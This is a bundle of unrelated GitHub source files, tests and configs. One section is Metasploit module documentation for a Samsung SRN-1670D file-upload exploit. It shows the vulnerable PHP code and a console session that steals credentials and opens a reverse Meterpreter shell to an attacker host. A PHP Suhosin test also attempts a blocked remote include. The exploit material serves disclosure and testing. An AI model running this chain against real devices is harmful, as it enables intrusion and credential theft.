'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); (instagram as any).request('GET', endpoint, (_, result) => { expect(result).toMatchSnapshot(); done(); }); }); it('sould call callback with error', done => { const endpoint = 
'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(400, { message: 'error' }); (instagram as any).request('GET', endpoint, err => { expect(err).toMatchSnapshot(); done(); }); }); }); describe('#get', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould make get request', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); const result = await instagram.get(endpoint); expect(result).toMatchSnapshot(); }); }); describe('#post', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould make post request', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .post(`/v1/${endpoint}`, { access_token: 'toto', }) .reply(200, { message: 'success' }); const result = await instagram.post(endpoint); expect(result).toMatchSnapshot(); }); }); describe('#delete', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould make delete request', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .delete(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); const result = await instagram.delete(endpoint); expect(result).toMatchSnapshot(); }); }); describe('#getAuthorizationUrl', () => { const instagram = new Instagram({ clientId: 'clientId', accessToken: 'toto', } as any); const redirectUrl = 'http://localhost:3000'; it('sould generate authorization url', async () => { const url = instagram.getAuthorizationUrl(redirectUrl); expect(url).toMatchSnapshot(); }); it('sould generate pass scope', async () => { const url = instagram.getAuthorizationUrl(redirectUrl, { scope: 'likes', }); expect(url).toMatchSnapshot(); }); it('sould generate pass scope array', async () => { const url = instagram.getAuthorizationUrl(redirectUrl, { scope: ['likes', 
'basic'], }); expect(url).toMatchSnapshot(); }); it('sould generate pass state', async () => { const url = instagram.getAuthorizationUrl(redirectUrl, { state: 'hey' }); expect(url).toMatchSnapshot(); }); }); describe('#authorizeUser', () => { const instagram = new Instagram({ clientId: 'clientId', clientSecret: 'clientSecret', } as any); const code = 'my-code'; const redirectUrl = 'http://localhost:3000'; it('sould make post request', async () => { nock('https://api.instagram.com') .post('/oauth/access_token', { code, redirect_uri: redirectUrl, client_id: 'clientId', client_secret: 'clientSecret', grant_type: 'authorization_code', }) .reply(200, { message: 'success' }); const result = await instagram.authorizeUser(code, redirectUrl); expect(result).toMatchSnapshot(); }); }); });
{ "pile_set_name": "Github" }
## Description

Samsung NVR Recorder SRN-1670D is a high-performance network video recorder. An arbitrary file upload vulnerability was found in the Web Viewer component, which could allow an authenticated user to upload a PHP payload to achieve code execution.

The vulnerable code can be found in network_ssl_upload.php:

```php
22 $path = "./upload/";
23 $file = $_FILES[ "attachFile" ];
24 $isApply = ( int )$_POST[ "is_apply" ];
25 $isInstall = ( int )$_POST[ "isInstall" ];
26 $isCertFlag = ( int )$_POST[ "isCertFlag" ];
27
28 // create socket
29 $N_message = "";
30 $sock = mySocket_create($_is_unix_socket);
31 $connected = mySocket_connect($_is_unix_socket, $sock);
32
33 $loginInfo = new loginInfo();
34 $retLogin = loginManager( $connected, $sock, null, $loginInfo );
35 if ( ( $retLogin == true ) && ( $isApply == 2 || $isApply == 3 ) ) {
36     if ($connected) {
37         $id = $loginInfo->get_id();
38         $xmlFile = $id.'_config.xml';
39         $N_message = "dummy".nvr_command::DELIM;
40         $N_message .= "userid ".$id.nvr_command::DELIM;
41
42         if ( $isInstall == 1 ) {
43             // File upload ===============================================================
44             if ( $file[ "error" ] > 0 ) {
45                 $Error = "Error: ".$file[ "error" ];
46             } else {
47                 $retFile = @copy( $file[ "tmp_name" ], $path.$file[ "name" ] );
48             }
49             // ===========================================================================
50         }
```

To avoid the need for authentication, the exploit also takes advantage of another vulnerability (CVE-2015-8279) in the log exporting function to read an arbitrary file from the remote machine in order to obtain credentials that can be used for the attack.
## Vulnerable Application Samsung NVR Recorder SRN-1670D is a hardware: http://www.samsungcc.com.au/cctv/ip-nvr-solution/samsung-dvr-srn-1670d ## Scenarios ``` msf exploit(samsung_srv_1670d_upload_exec) > show options Module options (exploit/multi/http/samsung_srv_1670d_upload_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.1.200 yes The target address. RPORT 80 yes The target port (TCP). SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.122 yes The listen address LPORT 4358 yes The listen port Exploit target: Id Name -- ---- 0 Samsung SRN-1670D == 1.0.0.193 msf exploit(samsung_srv_1670d_upload_exec) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.122:4358 msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails... [+] Credentials obtained successfully: admin:pass123! [*] Logging... [+] Authentication Succeeded [*] Generating payload[ eRdGKfFJ.php ]... [*] Uploading payload... [*] Executing payload... [*] Sending stage (33986 bytes) to 192.168.1.200 [*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100 ```
{ "pile_set_name": "Github" }
/* -*- mode: c; c-basic-offset: 8; -*- * vim: noexpandtab sw=8 ts=8 sts=0: * * blockcheck.c * * Checksum and ECC codes for the OCFS2 userspace library. * * Copyright (C) 2006, 2008 Oracle. All rights reserved. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public * License, version 2, as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. */ #include <linux/kernel.h> #include <linux/types.h> #include <linux/crc32.h> #include <linux/buffer_head.h> #include <linux/bitops.h> #include <linux/debugfs.h> #include <linux/module.h> #include <linux/fs.h> #include <asm/byteorder.h> #include <cluster/masklog.h> #include "ocfs2.h" #include "blockcheck.h" /* * We use the following conventions: * * d = # data bits * p = # parity bits * c = # total code bits (d + p) */ /* * Calculate the bit offset in the hamming code buffer based on the bit's * offset in the data buffer. Since the hamming code reserves all * power-of-two bits for parity, the data bit number and the code bit * number are offset by all the parity bits beforehand. * * Recall that bit numbers in hamming code are 1-based. This function * takes the 0-based data bit from the caller. * * An example. Take bit 1 of the data buffer. 1 is a power of two (2^0), * so it's a parity bit. 2 is a power of two (2^1), so it's a parity bit. * 3 is not a power of two. So bit 1 of the data buffer ends up as bit 3 * in the code buffer. * * The caller can pass in *p if it wants to keep track of the most recent * number of parity bits added. This allows the function to start the * calculation at the last place. 
*/ static unsigned int calc_code_bit(unsigned int i, unsigned int *p_cache) { unsigned int b, p = 0; /* * Data bits are 0-based, but we're talking code bits, which * are 1-based. */ b = i + 1; /* Use the cache if it is there */ if (p_cache) p = *p_cache; b += p; /* * For every power of two below our bit number, bump our bit. * * We compare with (b + 1) because we have to compare with what b * would be _if_ it were bumped up by the parity bit. Capice? * * p is set above. */ for (; (1 << p) < (b + 1); p++) b++; if (p_cache) *p_cache = p; return b; } /* * This is the low level encoder function. It can be called across * multiple hunks just like the crc32 code. 'd' is the number of bits * _in_this_hunk_. nr is the bit offset of this hunk. So, if you had * two 512B buffers, you would do it like so: * * parity = ocfs2_hamming_encode(0, buf1, 512 * 8, 0); * parity = ocfs2_hamming_encode(parity, buf2, 512 * 8, 512 * 8); * * If you just have one buffer, use ocfs2_hamming_encode_block(). */ u32 ocfs2_hamming_encode(u32 parity, void *data, unsigned int d, unsigned int nr) { unsigned int i, b, p = 0; BUG_ON(!d); /* * b is the hamming code bit number. Hamming code specifies a * 1-based array, but C uses 0-based. So 'i' is for C, and 'b' is * for the algorithm. * * The i++ in the for loop is so that the start offset passed * to ocfs2_find_next_bit_set() is one greater than the previously * found bit. */ for (i = 0; (i = ocfs2_find_next_bit(data, d, i)) < d; i++) { /* * i is the offset in this hunk, nr + i is the total bit * offset. */ b = calc_code_bit(nr + i, &p); /* * Data bits in the resultant code are checked by * parity bits that are part of the bit number * representation. Huh? * * <wikipedia href="http://en.wikipedia.org/wiki/Hamming_code"> * In other words, the parity bit at position 2^k * checks bits in positions having bit k set in * their binary representation. Conversely, for * instance, bit 13, i.e. 
1101(2), is checked by * bits 1000(2) = 8, 0100(2)=4 and 0001(2) = 1. * </wikipedia> * * Note that 'k' is the _code_ bit number. 'b' in * our loop. */ parity ^= b; } /* While the data buffer was treated as little endian, the * return value is in host endian. */ return parity; } u32 ocfs2_hamming_encode_block(void *data, unsigned int blocksize) { return ocfs2_hamming_encode(0, data, blocksize * 8, 0); } /* * Like ocfs2_hamming_encode(), this can handle hunks. nr is the bit * offset of the current hunk. If bit to be fixed is not part of the * current hunk, this does nothing. * * If you only have one hunk, use ocfs2_hamming_fix_block(). */ void ocfs2_hamming_fix(void *data, unsigned int d, unsigned int nr, unsigned int fix) { unsigned int i, b; BUG_ON(!d); /* * If the bit to fix has an hweight of 1, it's a parity bit. One * busted parity bit is its own error. Nothing to do here. */ if (hweight32(fix) == 1) return; /* * nr + d is the bit right past the data hunk we're looking at. * If fix after that, nothing to do */ if (fix >= calc_code_bit(nr + d, NULL)) return; /* * nr is the offset in the data hunk we're starting at. Let's * start b at the offset in the code buffer. See hamming_encode() * for a more detailed description of 'b'. */ b = calc_code_bit(nr, NULL); /* If the fix is before this hunk, nothing to do */ if (fix < b) return; for (i = 0; i < d; i++, b++) { /* Skip past parity bits */ while (hweight32(b) == 1) b++; /* * i is the offset in this data hunk. * nr + i is the offset in the total data buffer. * b is the offset in the total code buffer. * * Thus, when b == fix, bit i in the current hunk needs * fixing. */ if (b == fix) { if (ocfs2_test_bit(i, data)) ocfs2_clear_bit(i, data); else ocfs2_set_bit(i, data); break; } } } void ocfs2_hamming_fix_block(void *data, unsigned int blocksize, unsigned int fix) { ocfs2_hamming_fix(data, blocksize * 8, 0, fix); } /* * Debugfs handling. 
*/ #ifdef CONFIG_DEBUG_FS static int blockcheck_u64_get(void *data, u64 *val) { *val = *(u64 *)data; return 0; } DEFINE_SIMPLE_ATTRIBUTE(blockcheck_fops, blockcheck_u64_get, NULL, "%llu\n"); static struct dentry *blockcheck_debugfs_create(const char *name, struct dentry *parent, u64 *value) { return debugfs_create_file(name, S_IFREG | S_IRUSR, parent, value, &blockcheck_fops); } static void ocfs2_blockcheck_debug_remove(struct ocfs2_blockcheck_stats *stats) { if (stats) { debugfs_remove(stats->b_debug_check); stats->b_debug_check = NULL; debugfs_remove(stats->b_debug_failure); stats->b_debug_failure = NULL; debugfs_remove(stats->b_debug_recover); stats->b_debug_recover = NULL; debugfs_remove(stats->b_debug_dir); stats->b_debug_dir = NULL; } } static int ocfs2_blockcheck_debug_install(struct ocfs2_blockcheck_stats *stats, struct dentry *parent) { int rc = -EINVAL; if (!stats) goto out; stats->b_debug_dir = debugfs_create_dir("blockcheck", parent); if (!stats->b_debug_dir) goto out; stats->b_debug_check = blockcheck_debugfs_create("blocks_checked", stats->b_debug_dir, &stats->b_check_count); stats->b_debug_failure = blockcheck_debugfs_create("checksums_failed", stats->b_debug_dir, &stats->b_failure_count); stats->b_debug_recover = blockcheck_debugfs_create("ecc_recoveries", stats->b_debug_dir, &stats->b_recover_count); if (stats->b_debug_check && stats->b_debug_failure && stats->b_debug_recover) rc = 0; out: if (rc) ocfs2_blockcheck_debug_remove(stats); return rc; } #else static inline int ocfs2_blockcheck_debug_install(struct ocfs2_blockcheck_stats *stats, struct dentry *parent) { return 0; } static inline void ocfs2_blockcheck_debug_remove(struct ocfs2_blockcheck_stats *stats) { } #endif /* CONFIG_DEBUG_FS */ /* Always-called wrappers for starting and stopping the debugfs files */ int ocfs2_blockcheck_stats_debugfs_install(struct ocfs2_blockcheck_stats *stats, struct dentry *parent) { return ocfs2_blockcheck_debug_install(stats, parent); } void 
ocfs2_blockcheck_stats_debugfs_remove(struct ocfs2_blockcheck_stats *stats) { ocfs2_blockcheck_debug_remove(stats); } static void ocfs2_blockcheck_inc_check(struct ocfs2_blockcheck_stats *stats) { u64 new_count; if (!stats) return; spin_lock(&stats->b_lock); stats->b_check_count++; new_count = stats->b_check_count; spin_unlock(&stats->b_lock); if (!new_count) mlog(ML_NOTICE, "Block check count has wrapped\n"); } static void ocfs2_blockcheck_inc_failure(struct ocfs2_blockcheck_stats *stats) { u64 new_count; if (!stats) return; spin_lock(&stats->b_lock); stats->b_failure_count++; new_count = stats->b_failure_count; spin_unlock(&stats->b_lock); if (!new_count) mlog(ML_NOTICE, "Checksum failure count has wrapped\n"); } static void ocfs2_blockcheck_inc_recover(struct ocfs2_blockcheck_stats *stats) { u64 new_count; if (!stats) return; spin_lock(&stats->b_lock); stats->b_recover_count++; new_count = stats->b_recover_count; spin_unlock(&stats->b_lock); if (!new_count) mlog(ML_NOTICE, "ECC recovery count has wrapped\n"); } /* * These are the low-level APIs for using the ocfs2_block_check structure. */ /* * This function generates check information for a block. * data is the block to be checked. bc is a pointer to the * ocfs2_block_check structure describing the crc32 and the ecc. * * bc should be a pointer inside data, as the function will * take care of zeroing it before calculating the check information. If * bc does not point inside data, the caller must make sure any inline * ocfs2_block_check structures are zeroed. * * The data buffer must be in on-disk endian (little endian for ocfs2). * bc will be filled with little-endian values and will be ready to go to * disk. 
*/ void ocfs2_block_check_compute(void *data, size_t blocksize, struct ocfs2_block_check *bc) { u32 crc; u32 ecc; memset(bc, 0, sizeof(struct ocfs2_block_check)); crc = crc32_le(~0, data, blocksize); ecc = ocfs2_hamming_encode_block(data, blocksize); /* * No ecc'd ocfs2 structure is larger than 4K, so ecc will be no * larger than 16 bits. */ BUG_ON(ecc > USHRT_MAX); bc->bc_crc32e = cpu_to_le32(crc); bc->bc_ecc = cpu_to_le16((u16)ecc); } /* * This function validates existing check information. Like _compute, * the function will take care of zeroing bc before calculating check codes. * If bc is not a pointer inside data, the caller must have zeroed any * inline ocfs2_block_check structures. * * Again, the data passed in should be the on-disk endian. */ int ocfs2_block_check_validate(void *data, size_t blocksize, struct ocfs2_block_check *bc, struct ocfs2_blockcheck_stats *stats) { int rc = 0; u32 bc_crc32e; u16 bc_ecc; u32 crc, ecc; ocfs2_blockcheck_inc_check(stats); bc_crc32e = le32_to_cpu(bc->bc_crc32e); bc_ecc = le16_to_cpu(bc->bc_ecc); memset(bc, 0, sizeof(struct ocfs2_block_check)); /* Fast path - if the crc32 validates, we're good to go */ crc = crc32_le(~0, data, blocksize); if (crc == bc_crc32e) goto out; ocfs2_blockcheck_inc_failure(stats); mlog(ML_ERROR, "CRC32 failed: stored: 0x%x, computed 0x%x. Applying ECC.\n", (unsigned int)bc_crc32e, (unsigned int)crc); /* Ok, try ECC fixups */ ecc = ocfs2_hamming_encode_block(data, blocksize); ocfs2_hamming_fix_block(data, blocksize, ecc ^ bc_ecc); /* And check the crc32 again */ crc = crc32_le(~0, data, blocksize); if (crc == bc_crc32e) { ocfs2_blockcheck_inc_recover(stats); goto out; } mlog(ML_ERROR, "Fixed CRC32 failed: stored: 0x%x, computed 0x%x\n", (unsigned int)bc_crc32e, (unsigned int)crc); rc = -EIO; out: bc->bc_crc32e = cpu_to_le32(bc_crc32e); bc->bc_ecc = cpu_to_le16(bc_ecc); return rc; } /* * This function generates check information for a list of buffer_heads. * bhs is the blocks to be checked. 
bc is a pointer to the * ocfs2_block_check structure describing the crc32 and the ecc. * * bc should be a pointer inside data, as the function will * take care of zeroing it before calculating the check information. If * bc does not point inside data, the caller must make sure any inline * ocfs2_block_check structures are zeroed. * * The data buffer must be in on-disk endian (little endian for ocfs2). * bc will be filled with little-endian values and will be ready to go to * disk. */ void ocfs2_block_check_compute_bhs(struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc) { int i; u32 crc, ecc; BUG_ON(nr < 0); if (!nr) return; memset(bc, 0, sizeof(struct ocfs2_block_check)); for (i = 0, crc = ~0, ecc = 0; i < nr; i++) { crc = crc32_le(crc, bhs[i]->b_data, bhs[i]->b_size); /* * The number of bits in a buffer is obviously b_size*8. * The offset of this buffer is b_size*i, so the bit offset * of this buffer is b_size*8*i. */ ecc = (u16)ocfs2_hamming_encode(ecc, bhs[i]->b_data, bhs[i]->b_size * 8, bhs[i]->b_size * 8 * i); } /* * No ecc'd ocfs2 structure is larger than 4K, so ecc will be no * larger than 16 bits. */ BUG_ON(ecc > USHRT_MAX); bc->bc_crc32e = cpu_to_le32(crc); bc->bc_ecc = cpu_to_le16((u16)ecc); } /* * This function validates existing check information on a list of * buffer_heads. Like _compute_bhs, the function will take care of * zeroing bc before calculating check codes. If bc is not a pointer * inside data, the caller must have zeroed any inline * ocfs2_block_check structures. * * Again, the data passed in should be the on-disk endian. 
*/ int ocfs2_block_check_validate_bhs(struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc, struct ocfs2_blockcheck_stats *stats) { int i, rc = 0; u32 bc_crc32e; u16 bc_ecc; u32 crc, ecc, fix; BUG_ON(nr < 0); if (!nr) return 0; ocfs2_blockcheck_inc_check(stats); bc_crc32e = le32_to_cpu(bc->bc_crc32e); bc_ecc = le16_to_cpu(bc->bc_ecc); memset(bc, 0, sizeof(struct ocfs2_block_check)); /* Fast path - if the crc32 validates, we're good to go */ for (i = 0, crc = ~0; i < nr; i++) crc = crc32_le(crc, bhs[i]->b_data, bhs[i]->b_size); if (crc == bc_crc32e) goto out; ocfs2_blockcheck_inc_failure(stats); mlog(ML_ERROR, "CRC32 failed: stored: %u, computed %u. Applying ECC.\n", (unsigned int)bc_crc32e, (unsigned int)crc); /* Ok, try ECC fixups */ for (i = 0, ecc = 0; i < nr; i++) { /* * The number of bits in a buffer is obviously b_size*8. * The offset of this buffer is b_size*i, so the bit offset * of this buffer is b_size*8*i. */ ecc = (u16)ocfs2_hamming_encode(ecc, bhs[i]->b_data, bhs[i]->b_size * 8, bhs[i]->b_size * 8 * i); } fix = ecc ^ bc_ecc; for (i = 0; i < nr; i++) { /* * Try the fix against each buffer. It will only affect * one of them. */ ocfs2_hamming_fix(bhs[i]->b_data, bhs[i]->b_size * 8, bhs[i]->b_size * 8 * i, fix); } /* And check the crc32 again */ for (i = 0, crc = ~0; i < nr; i++) crc = crc32_le(crc, bhs[i]->b_data, bhs[i]->b_size); if (crc == bc_crc32e) { ocfs2_blockcheck_inc_recover(stats); goto out; } mlog(ML_ERROR, "Fixed CRC32 failed: stored: %u, computed %u\n", (unsigned int)bc_crc32e, (unsigned int)crc); rc = -EIO; out: bc->bc_crc32e = cpu_to_le32(bc_crc32e); bc->bc_ecc = cpu_to_le16(bc_ecc); return rc; } /* * These are the main API. They check the superblock flag before * calling the underlying operations. * * They expect the buffer(s) to be in disk format. 
*/ void ocfs2_compute_meta_ecc(struct super_block *sb, void *data, struct ocfs2_block_check *bc) { if (ocfs2_meta_ecc(OCFS2_SB(sb))) ocfs2_block_check_compute(data, sb->s_blocksize, bc); } int ocfs2_validate_meta_ecc(struct super_block *sb, void *data, struct ocfs2_block_check *bc) { int rc = 0; struct ocfs2_super *osb = OCFS2_SB(sb); if (ocfs2_meta_ecc(osb)) rc = ocfs2_block_check_validate(data, sb->s_blocksize, bc, &osb->osb_ecc_stats); return rc; } void ocfs2_compute_meta_ecc_bhs(struct super_block *sb, struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc) { if (ocfs2_meta_ecc(OCFS2_SB(sb))) ocfs2_block_check_compute_bhs(bhs, nr, bc); } int ocfs2_validate_meta_ecc_bhs(struct super_block *sb, struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc) { int rc = 0; struct ocfs2_super *osb = OCFS2_SB(sb); if (ocfs2_meta_ecc(osb)) rc = ocfs2_block_check_validate_bhs(bhs, nr, bc, &osb->osb_ecc_stats); return rc; }
{ "pile_set_name": "Github" }
package com.example.firstapp

import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle

/**
 * Launcher activity hosting the app's single screen, defined by
 * R.layout.activity_main.  Holds no state of its own.
 */
class MainActivity : AppCompatActivity() {
    // savedInstanceState is non-null when the activity is re-created
    // (e.g. after a configuration change); nothing here depends on it.
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState) // must run before any view setup
        setContentView(R.layout.activity_main) // inflate the screen's layout
    }
}
{ "pile_set_name": "Github" }
package abi36_0_0.org.unimodules.interfaces.facedetector;

import android.content.Context;

/**
 * Factory abstraction for obtaining {@link FaceDetector} instances,
 * letting consumers stay independent of the concrete detector
 * implementation backing them.
 */
public interface FaceDetectorProvider {
  /**
   * Creates a face detector bound to the given Android context.
   *
   * @param context context the detector will operate in
   * @return a new {@link FaceDetector} instance
   */
  FaceDetector createFaceDetectorWithContext(Context context);
}
{ "pile_set_name": "Github" }
library isapiapp;
// ISAPI extension DLL project for the WineCellar demo server.  All
// application logic lives in the shared units under
// ..\..\winecellarserver; this project only packages them as an IIS
// extension.

uses
  Winapi.ActiveX,
  System.Win.ComObj,
  Web.WebBroker,
  Web.Win.ISAPIApp,
  Web.Win.ISAPIThreadPool,
  MainDataModuleUnit in '..\..\winecellarserver\MainDataModuleUnit.pas' {WineCellarDataModule: TDataModule},
  MainWebModuleUnit in '..\..\winecellarserver\MainWebModuleUnit.pas' {wm: TWebModule},
  WineCellarAppControllerU in '..\..\winecellarserver\WineCellarAppControllerU.pas',
  WinesBO in '..\..\winecellarserver\WinesBO.pas';

{$R *.res}

// Standard ISAPI entry points that IIS resolves by name from the DLL.
exports
  GetExtensionVersion,
  HttpExtensionProc,
  TerminateExtension;

begin
  // Request the multithreaded COM apartment before the WebBroker
  // application starts up (presumably consumed during
  // Application.Initialize — TODO confirm), since ISAPI requests are
  // served from a thread pool.
  CoInitFlags := COINIT_MULTITHREADED;
  Application.Initialize;
  Application.WebModuleClass := WebModuleClass;
  Application.Run;
end.
{ "pile_set_name": "Github" }
Running with -XNoAlternativeLayoutRule Running with -XAlternativeLayoutRule Running with -XAlternativeLayoutRule -XAlternativeLayoutRuleTransitional
{ "pile_set_name": "Github" }
/////////////////////////////////////////////////////////////////////////////// // /// \file tuklib_common.h /// \brief Common definitions for tuklib modules // // Author: Lasse Collin // // This file has been put into the public domain. // You can do whatever you want with this file. // /////////////////////////////////////////////////////////////////////////////// #ifndef TUKLIB_COMMON_H #define TUKLIB_COMMON_H // The config file may be replaced by a package-specific file. // It should include at least stddef.h, inttypes.h, and limits.h. #include "tuklib_config.h" // TUKLIB_SYMBOL_PREFIX is prefixed to all symbols exported by // the tuklib modules. If you use a tuklib module in a library, // you should use TUKLIB_SYMBOL_PREFIX to make sure that there // are no symbol conflicts in case someone links your library // into application that also uses the same tuklib module. #ifndef TUKLIB_SYMBOL_PREFIX # define TUKLIB_SYMBOL_PREFIX #endif #define TUKLIB_CAT_X(a, b) a ## b #define TUKLIB_CAT(a, b) TUKLIB_CAT_X(a, b) #ifndef TUKLIB_SYMBOL # define TUKLIB_SYMBOL(sym) TUKLIB_CAT(TUKLIB_SYMBOL_PREFIX, sym) #endif #ifndef TUKLIB_DECLS_BEGIN # ifdef __cplusplus # define TUKLIB_DECLS_BEGIN extern "C" { # else # define TUKLIB_DECLS_BEGIN # endif #endif #ifndef TUKLIB_DECLS_END # ifdef __cplusplus # define TUKLIB_DECLS_END } # else # define TUKLIB_DECLS_END # endif #endif #if defined(__GNUC__) && defined(__GNUC_MINOR__) # define TUKLIB_GNUC_REQ(major, minor) \ ((__GNUC__ == (major) && __GNUC_MINOR__ >= (minor)) \ || __GNUC__ > (major)) #else # define TUKLIB_GNUC_REQ(major, minor) 0 #endif #if TUKLIB_GNUC_REQ(2, 5) # define tuklib_attr_noreturn __attribute__((__noreturn__)) #else # define tuklib_attr_noreturn #endif #if (defined(_WIN32) && !defined(__CYGWIN__)) \ || defined(__OS2__) || defined(__MSDOS__) # define TUKLIB_DOSLIKE 1 #endif #endif
{ "pile_set_name": "Github" }
--TEST-- Include_once "Temp Variable URL"; --SKIPIF-- <?php include "../skipifcli.inc"; ?> --INI-- suhosin.log.syslog=0 suhosin.log.sapi=255 suhosin.log.script=0 suhosin.log.phpscript=0 suhosin.executor.include.whitelist= suhosin.executor.include.blacklist= --FILE-- <?php $var = "http://127.0.0.1/"; $app = "?"; include_once $var.$app; ?> --EXPECTF-- ALERT - Include filename ('http://127.0.0.1/?') is a URL that is not allowed (attacker 'REMOTE_ADDR not set', file '%s', line 4)
{ "pile_set_name": "Github" }
using System;
using System.ComponentModel;
using System.Drawing;
using DevExpress.ExpressApp.Editors;
using DevExpress.Utils;
using DevExpress.Utils.Controls;
using DevExpress.Utils.Design;
using DevExpress.XtraGrid;
using DevExpress.XtraGrid.Design;

namespace Xpand.ExpressApp.Win.ListEditors.GridListEditors.ColumnView.Design {
    /// <summary>
    /// Contract for column-view list editors that expose footer support,
    /// design-mode override, and a hook for customizing grid view creation.
    /// </summary>
    public interface IColumnViewEditor : ISupportFooter {
        /// <summary>
        /// When set, forces the view's design mode; hidden from the
        /// property grid and never serialized by the designer.
        /// </summary>
        [Browsable(false)]
        [DesignerSerializationVisibility(DesignerSerializationVisibility.Hidden)]
        bool OverrideViewDesignMode { get; set; }
        /// <summary>
        /// Raised so subscribers can supply their own grid view instance
        /// instead of the default one (see CustomGridViewCreateEventArgs).
        /// </summary>
        event EventHandler<CustomGridViewCreateEventArgs> CustomGridViewCreate;
    }

    /// <summary>
    /// Event data for <see cref="IColumnViewEditor.CustomGridViewCreate"/>.
    /// Handlers may assign <see cref="GridView"/> and set Handled (from
    /// HandledEventArgs) to take over view creation.
    /// </summary>
    public class CustomGridViewCreateEventArgs : HandledEventArgs {
        public CustomGridViewCreateEventArgs(GridControl gridControl) {
            GridControl = gridControl;
        }

        // The view a handler wants the editor to use; null when unhandled.
        public DevExpress.XtraGrid.Views.Base.ColumnView GridView { get; set; }
        // The grid control the view will be created for; fixed at construction.
        public GridControl GridControl { get; private set; }
    }

    /// <summary>
    /// Base design-time designer for column views.  Supplies the shared
    /// 16x16/32x32 image lists loaded from the XtraGrid resources and an
    /// (intentionally empty) designer-group registration.
    /// </summary>
    public abstract class ColumnViewDesigner : BaseDesigner {
        // [ThreadStatic]: each designer thread gets its own cache, so the
        // lazy initialization below needs no locking.
        [ThreadStatic]
        static ImageCollection _largeImages;
        [ThreadStatic]
        static ImageCollection _smallImages;

        // Lazily loads the 32x32 icon strip from the XtraGrid assembly's
        // embedded resources; cached per thread afterwards.
        static ImageCollection LargeImages {
            get {
                return _largeImages ??
                       (_largeImages =
                        ImageHelper.CreateImageCollectionFromResources("DevExpress.XtraGrid.Images.icons32x32.png",
                                                                       typeof(BaseGridDesigner).Assembly, new Size(32, 32)));
            }
        }

        // Same as LargeImages, but for the 16x16 icon strip.
        static ImageCollection SmallImages {
            get {
                return _smallImages ??
                       (_smallImages =
                        ImageHelper.CreateImageCollectionFromResources("DevExpress.XtraGrid.Images.icons16x16.png",
                                                                       typeof(BaseGridDesigner).Assembly, new Size(16, 16)));
            }
        }

        protected override object LargeImageList { get { return LargeImages; } }
        protected override object SmallImageList { get { return SmallImages; } }

        // Clears the inherited designer groups and registers none of its
        // own.  The registration code below is deliberately disabled
        // (kept for reference); the group pages it would add depend on
        // version-specific DevExpress design assemblies.
        protected override void CreateGroups() {
            Groups.Clear();
            //            DesignerGroup group = Groups.Add(DesignerGroupType.Main.ToString(), "Main Grid settings (adjust the view, columns, bands, and specify in-place editors and summaries).", null, true);
            //            var designerType = Type.GetType("DevExpress.XtraGrid.FeatureBrowser.FeatureBrowserGridMainFrame, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design");
            //            if (designerType != null)
            //                group.Add("Feature Browser", "Locate relevant options by features.", designerType, GetDefaultLargeImage(3), GetDefaultSmallImage(3), null);
            //            designerType = Type.GetType("DevExpress.XtraGrid.Frames.ViewsEditor, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design");
            //            if (designerType != null)
            //                group.Add("View Repository", "Manage views.", designerType, GetDefaultLargeImage(6), GetDefaultSmallImage(6), true);
            //            designerType = Type.GetType("DevExpress.XtraGrid.Frames.ColumnDesigner, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design");
            //            if (designerType != null)
            //                group.Add("Columns", "Adjust the Column collection of the current view, assign in-place editors to columns and specify total summaries.", designerType, GetDefaultLargeImage(1), GetDefaultSmallImage(1), null);
            //            designerType = Type.GetType("DevExpress.XtraGrid.Frames.PersistentRepositoryGridEditor, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design");
            //            if (designerType != null)
            //                group.Add("In-place Editor Repository", "Adjust the editors used for in-place editing.", designerType, GetDefaultLargeImage(7), GetDefaultSmallImage(7), true);
        }
    }
}
{ "pile_set_name": "Github" }
{ "type": "minecraft:stonecutting", "ingredient": { "item": "techreborn:steel_storage_block" }, "result": "techreborn:steel_storage_block_wall", "count": 1 }
{ "pile_set_name": "Github" }
package org.bukkit.event.entity;

import org.bukkit.entity.LivingEntity;

/**
 * Called when a creature is spawned into a world.
 * <p>
 * If a Creature Spawn event is cancelled, the creature will not spawn.
 */
public class CreatureSpawnEvent extends EntitySpawnEvent {
    // Why this creature is spawning; immutable for the event's lifetime.
    private final SpawnReason spawnReason;

    /**
     * @param spawnee the creature being spawned
     * @param spawnReason why it is being spawned
     */
    public CreatureSpawnEvent(final LivingEntity spawnee, final SpawnReason spawnReason) {
        super(spawnee);
        this.spawnReason = spawnReason;
    }

    /**
     * {@inheritDoc}
     * <p>
     * Narrows the superclass return type: the spawnee passed to the
     * constructor is always a {@link LivingEntity}.
     */
    @Override
    public LivingEntity getEntity() {
